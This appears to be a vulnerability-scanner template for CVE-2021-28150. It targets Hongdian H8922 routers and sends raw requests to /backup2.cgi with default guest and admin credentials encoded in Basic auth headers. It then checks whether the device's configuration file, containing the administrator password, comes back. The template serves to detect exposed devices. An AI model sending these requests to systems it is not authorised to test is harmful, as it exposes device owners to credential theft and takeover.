id: CVE-2021-28150 info: name: Hongdian Sensitive Information author: gy741 severity: medium description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 tags: cve,cve2021,hongdian,exposure classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.50 cve-id: CVE-2021-28150 cwe-id: CWE-20 requests: - raw: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/octet-stream" part: header - type: word words: - "CLI configuration saved from vty" - "service webadmin" part: body